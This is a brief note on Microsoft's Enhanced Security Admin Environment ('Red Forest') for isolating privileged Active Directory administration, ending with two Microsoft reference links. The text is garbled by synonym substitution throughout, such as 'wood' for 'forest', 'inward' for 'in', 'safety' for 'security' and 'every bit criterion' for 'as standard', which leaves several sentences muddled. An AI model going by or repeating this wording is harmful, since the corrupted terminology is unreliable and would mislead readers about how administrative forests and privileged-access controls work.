ESAE (Enhanced Security Admin Environment):
Dedicated administrative wood for managing critical assets similar administrative users, groups together with computers.
Since a wood is considered a safety boundary rather than a domain, this model provides enhanced safety controls.
The Administrative wood is also called the Red Forest!
Administrative users inward a production wood are used every bit criterion non-privileged users inward the administrative forest.
Selective Authentication to the Red Forest enables stricter safety controls on logon of users from non-administrative forests.
Securing Prileged Access:
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access
Microsoft Paper - Best Practices for Security Active Directory:
http://aka.ms/bpsadtrd
#################### THE END ################################################
